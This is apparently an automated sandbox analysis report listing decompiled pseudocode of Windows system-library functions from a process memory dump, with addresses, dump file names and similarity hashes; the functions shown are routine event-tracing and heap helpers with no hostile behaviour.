			E052E138A(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				void* __edi;
				void* __esi;
				signed char* _t21;
				intOrPtr _t27;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_t32 = __edx;
				_t27 = __ebx;
				_v8 =  *0x531d360 ^ _t35;
				_t33 = __edx;
				_t34 = __ecx;
				E0526FA60( &_v60, 0, 0x30);
				_v20 = _a4;
				_v16 = _a8;
				_v28 = _t34;
				_v24 = _t33;
				_v54 = 0x1033;
				if(E05247D50() == 0) {
					_t21 = 0x7ffe0388;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				_push( *_t21 & 0x000000ff);
				return E0526B640(E05269AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}

0x052e138a
0x052e138a
0x052e1399
0x052e13a3
0x052e13a8
0x052e13aa
0x052e13b5
0x052e13bb
0x052e13c3
0x052e13c6
0x052e13c9
0x052e13d4
0x052e13e6
0x052e13d6
0x052e13df
0x052e13df
0x052e13f1
0x052e13f2
0x052e13f4
0x052e13f9
0x052e140e

Memory Dump Source

Source File: 00000009.00000002.609101316.0000000005200000.00000040.00000001.sdmp, Offset: 05200000, based on PE: true

Associated: 00000009.00000002.609488564.000000000531B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.609500570.000000000531F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6636da8ceac019b315fccd554510f44c590286840c6608be455f75814f12c9d9
Instruction ID: 0d3001786a9f304e886422d1926a37230e334ef008dfdf1c54aaccaf42d63e36
Opcode Fuzzy Hash: 6636da8ceac019b315fccd554510f44c590286840c6608be455f75814f12c9d9
Instruction Fuzzy Hash: A1015E71E20318AFCB14DFA9D846EAEBBB8EF44710F504066F915EB380DA749E51CB94

Uniqueness

Uniqueness Score: -1.00%

Function 052258EC, Relevance: .0, Instructions: 47
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E052258EC(intOrPtr __ecx) {
				signed int _v8;
				char _v28;
				char _v44;
				char _v76;
				void* __edi;
				void* __esi;
				intOrPtr _t10;
				intOrPtr _t16;
				intOrPtr _t17;
				intOrPtr _t27;
				intOrPtr _t28;
				signed int _t29;

				_v8 =  *0x531d360 ^ _t29;
				_t10 =  *[fs:0x30];
				_t27 = __ecx;
				if(_t10 == 0) {
					L6:
					_t28 = 0x5205c80;
				} else {
					_t16 =  *((intOrPtr*)(_t10 + 0x10));
					if(_t16 == 0) {
						goto L6;
					} else {
						_t28 =  *((intOrPtr*)(_t16 + 0x3c));
					}
				}
				if(E05225943() != 0 &&  *0x5315320 > 5) {
					E052A7B5E( &_v44, _t27);
					_t22 =  &_v28;
					E052A7B5E( &_v28, _t28);
					_t11 = E052A7B9C(0x5315320, 0x520bf15,  &_v28, _t22, 4,  &_v76);
				}
				return E0526B640(_t11, _t17, _v8 ^ _t29, 0x520bf15, _t27, _t28);
			}

0x052258fb
0x052258fe
0x05225906
0x0522590a
0x0522593c
0x0522593c
0x0522590c
0x0522590c
0x05225911
0x00000000
0x05225913
0x05225913
0x05225913
0x05225911
0x0522591d
0x05281035
0x0528103c
0x0528103f
0x05281056
0x05281056
0x0522593b

Memory Dump Source

Source File: 00000009.00000002.609101316.0000000005200000.00000040.00000001.sdmp, Offset: 05200000, based on PE: true

Associated: 00000009.00000002.609488564.000000000531B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.609500570.000000000531F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b605c35372943e32030ca36ce4e1b6b253a4630037573da12133fc978451cae0
Instruction ID: 8d9ed169b4ed1a75f2558ba671d469c805b3aca6a5efe71125e2bc71fe5be9ea
Opcode Fuzzy Hash: b605c35372943e32030ca36ce4e1b6b253a4630037573da12133fc978451cae0
Instruction Fuzzy Hash: 0401D476B34114ABC714EB74DC449AEB7B9EF84220F988469E8069F280DE60DD01CA94

Uniqueness

Uniqueness Score: -1.00%

Function 0523B02A, Relevance: .0, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0523B02A(intOrPtr __ecx, signed short* __edx, short _a4) {
				signed char _t11;
				signed char* _t12;
				intOrPtr _t24;
				signed short* _t25;

				_t25 = __edx;
				_t24 = __ecx;
				_t11 = ( *[fs:0x30])[0x50];
				if(_t11 != 0) {
					if( *_t11 == 0) {
						goto L1;
					}
					_t12 = ( *[fs:0x30])[0x50] + 0x22a;
					L2:
					if( *_t12 != 0) {
						_t12 =  *[fs:0x30];
						if((_t12[0x240] & 0x00000004) == 0) {
							goto L3;
						}
						if(E05247D50() == 0) {
							_t12 = 0x7ffe0385;
						} else {
							_t12 = ( *[fs:0x30])[0x50] + 0x22b;
						}
						if(( *_t12 & 0x00000020) == 0) {
							goto L3;
						}
						return E052A7016(_a4, _t24, 0, 0, _t25, 0);
					}
					L3:
					return _t12;
				}
				L1:
				_t12 = 0x7ffe0384;
				goto L2;
			}

0x0523b037
0x0523b039
0x0523b03b
0x0523b040
0x0528a60e
0x00000000
0x00000000
0x0528a61d
0x0523b04b
0x0523b04e
0x0528a627
0x0528a634
0x00000000
0x00000000
0x0528a641
0x0528a653
0x0528a643
0x0528a64c
0x0528a64c
0x0528a65b
0x00000000
0x00000000
0x00000000
0x0528a66c
0x0523b057
0x0523b057
0x0523b057
0x0523b046
0x0523b046
0x00000000

Memory Dump Source

Source File: 00000009.00000002.609101316.0000000005200000.00000040.00000001.sdmp, Offset: 05200000, based on PE: true

Associated: 00000009.00000002.609488564.000000000531B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.609500570.000000000531F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
Instruction ID: 2dd4d2cd4d63e3e94528ecc6c09c9ae95e60e1bc82b38b87af2246e85c9028ec
Opcode Fuzzy Hash: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
Instruction Fuzzy Hash: AA01B1723295819FD722DB5DC848F7677D9FF41750F0900A2E919CB691DB68DC40C620

Uniqueness

Uniqueness Score: -1.00%

Function 052F1074, Relevance: .0, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E052F1074(intOrPtr __ebx, signed int* __ecx, char __edx, void* __edi, intOrPtr _a4) {
				char _v8;
				void* _v11;
				unsigned int _v12;
				void* _v15;
				void* __esi;
				void* __ebp;
				char* _t16;
				signed int* _t35;

				_t22 = __ebx;
				_t35 = __ecx;
				_v8 = __edx;
				_t13 =  !( *__ecx) + 1;
				_v12 =  !( *__ecx) + 1;
				if(_a4 != 0) {
					E052F165E(__ebx, 0x5318ae4, (__edx -  *0x5318b04 >> 0x14) + (__edx -  *0x5318b04 >> 0x14), __edi, __ecx, (__edx -  *0x5318b04 >> 0x14) + (__edx -  *0x5318b04 >> 0x14), (_t13 >> 0x14) + (_t13 >> 0x14));
				}
				E052EAFDE( &_v8,  &_v12, 0x8000,  *((intOrPtr*)(_t35 + 0x34)),  *((intOrPtr*)(_t35 + 0x38)));
				if(E05247D50() == 0) {
					_t16 = 0x7ffe0388;
				} else {
					_t16 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				if( *_t16 != 0) {
					_t16 = E052DFE3F(_t22, _t35, _v8, _v12);
				}
				return _t16;
			}

0x052f1074
0x052f1080
0x052f1082
0x052f108a
0x052f108f
0x052f1093
0x052f10ab
0x052f10ab
0x052f10c3
0x052f10cf
0x052f10e1
0x052f10d1
0x052f10da
0x052f10da
0x052f10e9
0x052f10f5
0x052f10f5
0x052f10fe

Memory Dump Source

Source File: 00000009.00000002.609101316.0000000005200000.00000040.00000001.sdmp, Offset: 05200000, based on PE: true

Associated: 00000009.00000002.609488564.000000000531B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.609500570.000000000531F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bc751eacaee4447d8ff3d1c9d52e0dd7847f6203cca8988875a5d83d68d37d15
Instruction ID: 271088e7f631f828236bfc7972bc0f8de5bfe404590e6284d5fd8eb26b7f3eef
Opcode Fuzzy Hash: bc751eacaee4447d8ff3d1c9d52e0dd7847f6203cca8988875a5d83d68d37d15
Instruction Fuzzy Hash: EC012872628742DBC710DF28D944B1AF7E5BF84310F448529FD8683290EE31D451CB96

Uniqueness

Uniqueness Score: -1.00%

Function 052DFE3F, Relevance: .0, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 59%

			E052DFE3F(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				short _v58;
				char _v64;
				void* __edi;
				void* __esi;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_t24 = __ebx;
				_v12 =  *0x531d360 ^ _t32;
				_t30 = __edx;
				_t31 = __ecx;
				E0526FA60( &_v64, 0, 0x30);
				_v24 = _a4;
				_v32 = _t31;
				_v28 = _t30;
				_v58 = 0x267;
				if(E05247D50() == 0) {
					_t18 = 0x7ffe0388;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v64);
				_push(0x10);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E0526B640(E05269AE0(), _t24, _v12 ^ _t32, _t29, _t30, _t31);
			}

0x052dfe3f
0x052dfe3f
0x052dfe4e
0x052dfe58
0x052dfe5d
0x052dfe5f
0x052dfe6a
0x052dfe72
0x052dfe75
0x052dfe78
0x052dfe83
0x052dfe95
0x052dfe85
0x052dfe8e
0x052dfe8e
0x052dfea0
0x052dfea1
0x052dfea3
0x052dfea8
0x052dfebd

Memory Dump Source

Source File: 00000009.00000002.609101316.0000000005200000.00000040.00000001.sdmp, Offset: 05200000, based on PE: true

Associated: 00000009.00000002.609488564.000000000531B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.609500570.000000000531F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 354917e65022d8d5c6cab3177ed12ff104989ec4989b6784289770d0acd061b3
Instruction ID: 9078695781c57698e530b571279be53ea5da55e1569f3b6df44187a27cbd5eb3
Opcode Fuzzy Hash: 354917e65022d8d5c6cab3177ed12ff104989ec4989b6784289770d0acd061b3
Instruction Fuzzy Hash: AD018471E20218ABCB14DFA9D845FAEBBB8EF44700F004466F901EB381DA709A41C7A4

Uniqueness

Uniqueness Score: -1.00%

Function 052DFEC0, Relevance: .0, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 59%

			E052DFEC0(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				short _v58;
				char _v64;
				void* __edi;
				void* __esi;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_t24 = __ebx;
				_v12 =  *0x531d360 ^ _t32;
				_t30 = __edx;
				_t31 = __ecx;
				E0526FA60( &_v64, 0, 0x30);
				_v24 = _a4;
				_v32 = _t31;
				_v28 = _t30;
				_v58 = 0x266;
				if(E05247D50() == 0) {
					_t18 = 0x7ffe0388;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v64);
				_push(0x10);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E0526B640(E05269AE0(), _t24, _v12 ^ _t32, _t29, _t30, _t31);
			}

0x052dfec0
0x052dfec0
0x052dfecf
0x052dfed9
0x052dfede
0x052dfee0
0x052dfeeb
0x052dfef3
0x052dfef6
0x052dfef9
0x052dff04
0x052dff16
0x052dff06
0x052dff0f
0x052dff0f
0x052dff21
0x052dff22
0x052dff24
0x052dff29
0x052dff3e

Memory Dump Source

Source File: 00000009.00000002.609101316.0000000005200000.00000040.00000001.sdmp, Offset: 05200000, based on PE: true

Associated: 00000009.00000002.609488564.000000000531B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.609500570.000000000531F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: faa1e6f07c17d3bd5de8bcd882edda0055e722e0e6f051c6f2a4805f24142e0e
Instruction ID: a62203eac0c7f629409d9c6ca28bb10245a901b90073aa26bbe8e0b553b441b1
Opcode Fuzzy Hash: faa1e6f07c17d3bd5de8bcd882edda0055e722e0e6f051c6f2a4805f24142e0e
Instruction Fuzzy Hash: A1018471A20258AFCB14DFA9D945FAEBBB8EF45700F004066F905EB380DA709A41C794

Uniqueness

Uniqueness Score: -1.00%

Function 052F8A62, Relevance: .0, Instructions: 44
COMMON

Download Yara Rule

C-Code - Quality: 54%

			E052F8A62(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				short _v66;
				char _v72;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed char* _t18;
				signed int _t32;

				_t29 = __edx;
				_v12 =  *0x531d360 ^ _t32;
				_t31 = _a8;
				_t30 = _a12;
				_v66 = 0x1c20;
				_v40 = __ecx;
				_v36 = __edx;
				_v32 = _a4;
				_v28 = _a8;
				_v24 = _a12;
				if(E05247D50() == 0) {
					_t18 = 0x7ffe0386;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v72);
				_push(0x14);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E0526B640(E05269AE0(), 0x1c20, _v12 ^ _t32, _t29, _t30, _t31);
			}

0x052f8a62
0x052f8a71
0x052f8a79
0x052f8a82
0x052f8a85
0x052f8a89
0x052f8a8c
0x052f8a8f
0x052f8a92
0x052f8a95
0x052f8a9f
0x052f8ab1
0x052f8aa1
0x052f8aaa
0x052f8aaa
0x052f8abc
0x052f8abd
0x052f8abf
0x052f8ac4
0x052f8ada

Memory Dump Source

Source File: 00000009.00000002.609101316.0000000005200000.00000040.00000001.sdmp, Offset: 05200000, based on PE: true

Associated: 00000009.00000002.609488564.000000000531B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.609500570.000000000531F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 119d669b22b700c111493f436ff7e38295654a664bb5bf49eefbe6441688f588
Instruction ID: 33a6addcf5e6c035438faeb541f098c5a17545f2d12bc4a1b442ac276fd1fbe3
Opcode Fuzzy Hash: 119d669b22b700c111493f436ff7e38295654a664bb5bf49eefbe6441688f588
Instruction Fuzzy Hash: 52012C71A1021DAFCB04DFA9D9459AEFBB8FF48310F10446AFA05E7341DB34AA01CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 052F8ED6, Relevance: .0, Instructions: 44
COMMON

Download Yara Rule

C-Code - Quality: 54%

			E052F8ED6(intOrPtr __ecx, intOrPtr __edx) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				short _v62;
				char _v68;
				signed char* _t29;
				intOrPtr _t35;
				intOrPtr _t41;
				intOrPtr _t42;
				signed int _t43;

				_t40 = __edx;
				_v8 =  *0x531d360 ^ _t43;
				_v28 = __ecx;
				_v62 = 0x1c2a;
				_v36 =  *((intOrPtr*)(__edx + 0xc8));
				_v32 =  *((intOrPtr*)(__edx + 0xcc));
				_v20 =  *((intOrPtr*)(__edx + 0xd8));
				_v16 =  *((intOrPtr*)(__edx + 0xd4));
				_v24 = __edx;
				_v12 = ( *(__edx + 0xde) & 0x000000ff) >> 0x00000001 & 0x00000001;
				if(E05247D50() == 0) {
					_t29 = 0x7ffe0386;
				} else {
					_t29 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v68);
				_push(0x1c);
				_push(0x20402);
				_push( *_t29 & 0x000000ff);
				return E0526B640(E05269AE0(), _t35, _v8 ^ _t43, _t40, _t41, _t42);
			}

0x052f8ed6
0x052f8ee5
0x052f8eed
0x052f8ef0
0x052f8efa
0x052f8f03
0x052f8f0c
0x052f8f15
0x052f8f24
0x052f8f27
0x052f8f31
0x052f8f43
0x052f8f33
0x052f8f3c
0x052f8f3c
0x052f8f4e
0x052f8f4f
0x052f8f51
0x052f8f56
0x052f8f69

Memory Dump Source

Source File: 00000009.00000002.609101316.0000000005200000.00000040.00000001.sdmp, Offset: 05200000, based on PE: true

Associated: 00000009.00000002.609488564.000000000531B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.609500570.000000000531F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: be010d450a1e76b20f17f978aeec6f9467d6d07cd61a769ee180adbc1100f180
Instruction ID: 78d1331b83f1caefa51b0208112efe93f7d0583f00ca5a0dd8925bff2f9a22e0
Opcode Fuzzy Hash: be010d450a1e76b20f17f978aeec6f9467d6d07cd61a769ee180adbc1100f180
Instruction Fuzzy Hash: 7A111E70A102199FDB04DFA8D545BAEFBF4FF08300F0442BAE519EB382EA349940CB90

Uniqueness

Uniqueness Score: -1.00%

Function 0522DB60, Relevance: .0, Instructions: 43
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0522DB60(signed int __ecx) {
				intOrPtr* _t9;
				void* _t12;
				void* _t13;
				intOrPtr _t14;

				_t9 = __ecx;
				_t14 = 0;
				if(__ecx == 0 ||  *((intOrPtr*)(__ecx)) != 0) {
					_t13 = 0xc000000d;
				} else {
					_t14 = E0522DB40();
					if(_t14 == 0) {
						_t13 = 0xc0000017;
					} else {
						_t13 = E0522E7B0(__ecx, _t12, _t14, 0xfff);
						if(_t13 < 0) {
							L0522E8B0(__ecx, _t14, 0xfff);
							L052477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t14);
							_t14 = 0;
						} else {
							_t13 = 0;
							 *((intOrPtr*)(_t14 + 0xc)) =  *0x7ffe03a4;
						}
					}
				}
				 *_t9 = _t14;
				return _t13;
			}

0x0522db64
0x0522db66
0x0522db6b
0x0522dbaa
0x0522db71
0x0522db76
0x0522db7a
0x0522dba3
0x0522db7c
0x0522db87
0x0522db8b
0x05284fa1
0x05284fb3
0x05284fb8
0x0522db91
0x0522db96
0x0522db98
0x0522db98
0x0522db8b
0x0522db7a
0x0522db9d
0x0522dba2

Memory Dump Source

Source File: 00000009.00000002.609101316.0000000005200000.00000040.00000001.sdmp, Offset: 05200000, based on PE: true

Associated: 00000009.00000002.609488564.000000000531B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.609500570.000000000531F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1
Instruction ID: 18c0fdf8fb9039145581f2e17bd7eca47dedef7f0329321fb2145815a40a0cdc
Opcode Fuzzy Hash: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1
Instruction Fuzzy Hash: 89F0FC3B325533BBD7326A5548A4F67B69A9FD2A60F160035F109DB344CA648C0396D1

Uniqueness

Uniqueness Score: -1.00%

Function 0522B1E1, Relevance: .0, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0522B1E1(intOrPtr __ecx, char __edx, char _a4, signed short* _a8) {
				signed char* _t13;
				intOrPtr _t22;
				char _t23;

				_t23 = __edx;
				_t22 = __ecx;
				if(E05247D50() != 0) {
					_t13 = ( *[fs:0x30])[0x50] + 0x22a;
				} else {
					_t13 = 0x7ffe0384;
				}
				if( *_t13 != 0) {
					_t13 =  *[fs:0x30];
					if((_t13[0x240] & 0x00000004) == 0) {
						goto L3;
					}
					if(E05247D50() == 0) {
						_t13 = 0x7ffe0385;
					} else {
						_t13 = ( *[fs:0x30])[0x50] + 0x22b;
					}
					if(( *_t13 & 0x00000020) == 0) {
						goto L3;
					}
					return E052A7016(0x14a4, _t22, _t23, _a4, _a8, 0);
				} else {
					L3:
					return _t13;
				}
			}

0x0522b1e8
0x0522b1ea
0x0522b1f3
0x05284a17
0x0522b1f9
0x0522b1f9
0x0522b1f9
0x0522b201
0x05284a21
0x05284a2e
0x00000000
0x00000000
0x05284a3b
0x05284a4d
0x05284a3d
0x05284a46
0x05284a46
0x05284a55
0x00000000
0x00000000
0x00000000
0x0522b20a
0x0522b20a
0x0522b20a
0x0522b20a

Memory Dump Source

Source File: 00000009.00000002.609101316.0000000005200000.00000040.00000001.sdmp, Offset: 05200000, based on PE: true

Associated: 00000009.00000002.609488564.000000000531B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.609500570.000000000531F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
Instruction ID: 577e748d6032f624aa5bc09d9925d527692f7058e41d21e1646a731f89531fcd
Opcode Fuzzy Hash: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
Instruction Fuzzy Hash: F2012132231681EBC722A799C808F797B9AFF41354F0804A1F9188B2B1DB78C800C754

Uniqueness

Uniqueness Score: -1.00%

Function 052BFE87, Relevance: .0, Instructions: 38
COMMON

Download Yara Rule

C-Code - Quality: 46%

			E052BFE87(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				signed int _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				signed char* _t21;
				intOrPtr _t27;
				intOrPtr _t32;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_v8 =  *0x531d360 ^ _t35;
				_v16 = __ecx;
				_v54 = 0x1722;
				_v24 =  *(__ecx + 0x14) & 0x00ffffff;
				_v28 =  *((intOrPtr*)(__ecx + 4));
				_v20 =  *((intOrPtr*)(__ecx + 0xc));
				if(E05247D50() == 0) {
					_t21 = 0x7ffe0382;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x228;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				_push( *_t21 & 0x000000ff);
				return E0526B640(E05269AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}

0x052bfe96
0x052bfe9e
0x052bfea1
0x052bfead
0x052bfeb3
0x052bfeb9
0x052bfec3
0x052bfed5
0x052bfec5
0x052bfece
0x052bfece
0x052bfee0
0x052bfee1
0x052bfee3
0x052bfee8
0x052bfefb

Memory Dump Source

Source File: 00000009.00000002.609101316.0000000005200000.00000040.00000001.sdmp, Offset: 05200000, based on PE: true

Associated: 00000009.00000002.609488564.000000000531B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.609500570.000000000531F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ba76935ebc839256ba5014af67a31b36b683dbd093c1e0a145acc925ccc728c1
Instruction ID: 3f48b04917e21e33459bbca24c457324babfe27bdf657e88e79bdc4ab2a36619
Opcode Fuzzy Hash: ba76935ebc839256ba5014af67a31b36b683dbd093c1e0a145acc925ccc728c1
Instruction Fuzzy Hash: F3016275A10208EFCB14DFA8D546A6EB7F4FF04300F144559B555DB382DA75DA01CB80

Uniqueness

Uniqueness Score: -1.00%

Function 052E131B, Relevance: .0, Instructions: 36
COMMON

Download Yara Rule

C-Code - Quality: 48%

			E052E131B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				short _v50;
				char _v56;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_v8 =  *0x531d360 ^ _t32;
				_v20 = _a4;
				_v12 = _a8;
				_v24 = __ecx;
				_v16 = __edx;
				_v50 = 0x1021;
				if(E05247D50() == 0) {
					_t18 = 0x7ffe0380;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				_push( &_v56);
				_push(0x10);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E0526B640(E05269AE0(), _t24, _v8 ^ _t32, _t29, _t30, _t31);
			}

0x052e131b
0x052e132a
0x052e1330
0x052e1336
0x052e133e
0x052e1341
0x052e1344
0x052e134f
0x052e1361
0x052e1351
0x052e135a
0x052e135a
0x052e136c
0x052e136d
0x052e136f
0x052e1374
0x052e1387

Memory Dump Source

Source File: 00000009.00000002.609101316.0000000005200000.00000040.00000001.sdmp, Offset: 05200000, based on PE: true

Associated: 00000009.00000002.609488564.000000000531B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.609500570.000000000531F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 04c5e381eb9ab37ccda97192041a1fbcfd8f470792a1cdc1e03672ec181869ad
Instruction ID: f7863ea728be77fe235e481f59807472b0a0f8546a9d29f9bb20ed86712c6467
Opcode Fuzzy Hash: 04c5e381eb9ab37ccda97192041a1fbcfd8f470792a1cdc1e03672ec181869ad
Instruction Fuzzy Hash: DC013C71E11208AFCB04EFA9D549AAEB7F4FF08700F508469F855EB381EA749A50CB94

Uniqueness

Uniqueness Score: -1.00%

Function 052F8F6A, Relevance: .0, Instructions: 36
COMMON

Download Yara Rule

C-Code - Quality: 48%

			E052F8F6A(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				short _v50;
				char _v56;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_v8 =  *0x531d360 ^ _t32;
				_v16 = __ecx;
				_v50 = 0x1c2c;
				_v24 = _a4;
				_v20 = _a8;
				_v12 = __edx;
				if(E05247D50() == 0) {
					_t18 = 0x7ffe0386;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v56);
				_push(0x10);
				_push(0x402);
				_push( *_t18 & 0x000000ff);
				return E0526B640(E05269AE0(), _t24, _v8 ^ _t32, _t29, _t30, _t31);
			}

0x052f8f6a
0x052f8f79
0x052f8f81
0x052f8f84
0x052f8f8b
0x052f8f91
0x052f8f94
0x052f8f9e
0x052f8fb0
0x052f8fa0
0x052f8fa9
0x052f8fa9
0x052f8fbb
0x052f8fbc
0x052f8fbe
0x052f8fc3
0x052f8fd6

Memory Dump Source

Source File: 00000009.00000002.609101316.0000000005200000.00000040.00000001.sdmp, Offset: 05200000, based on PE: true

Associated: 00000009.00000002.609488564.000000000531B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.609500570.000000000531F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c9431e81c6a259ecaf9639ca0bb7ee06e3adda0007e20a5880ebd35de21a1b34
Instruction ID: a6ff0ed8842bbf3b24d1cce3ce89570343c2406d70c423c97c8a7c08f3ab33a2
Opcode Fuzzy Hash: c9431e81c6a259ecaf9639ca0bb7ee06e3adda0007e20a5880ebd35de21a1b34
Instruction Fuzzy Hash: 35013C74A10209AFCB04EFA8D545AAEF7F4EF08300F508469B945EB381EA74DA00CB94

Uniqueness

Uniqueness Score: -1.00%

Function 052E1608, Relevance: .0, Instructions: 34
COMMON

Download Yara Rule

C-Code - Quality: 46%

			E052E1608(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				short _v46;
				char _v52;
				signed char* _t15;
				intOrPtr _t21;
				intOrPtr _t27;
				intOrPtr _t28;
				signed int _t29;

				_t26 = __edx;
				_v8 =  *0x531d360 ^ _t29;
				_v12 = _a4;
				_v20 = __ecx;
				_v16 = __edx;
				_v46 = 0x1024;
				if(E05247D50() == 0) {
					_t15 = 0x7ffe0380;
				} else {
					_t15 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				_push( &_v52);
				_push(0xc);
				_push(0x20402);
				_push( *_t15 & 0x000000ff);
				return E0526B640(E05269AE0(), _t21, _v8 ^ _t29, _t26, _t27, _t28);
			}

0x052e1608
0x052e1617
0x052e161d
0x052e1625
0x052e1628
0x052e162b
0x052e1636
0x052e1648
0x052e1638
0x052e1641
0x052e1641
0x052e1653
0x052e1654
0x052e1656
0x052e165b
0x052e166e

Memory Dump Source

Source File: 00000009.00000002.609101316.0000000005200000.00000040.00000001.sdmp, Offset: 05200000, based on PE: true

Associated: 00000009.00000002.609488564.000000000531B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.609500570.000000000531F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: acbfa748f56c5ed2d79a17a0c86c3da0772256a32b6a45423978547dcd3e15f4
Instruction ID: a9e7b618c63cb1f0506a0f957a069b39283202c38f94d5213953bede2021bdad
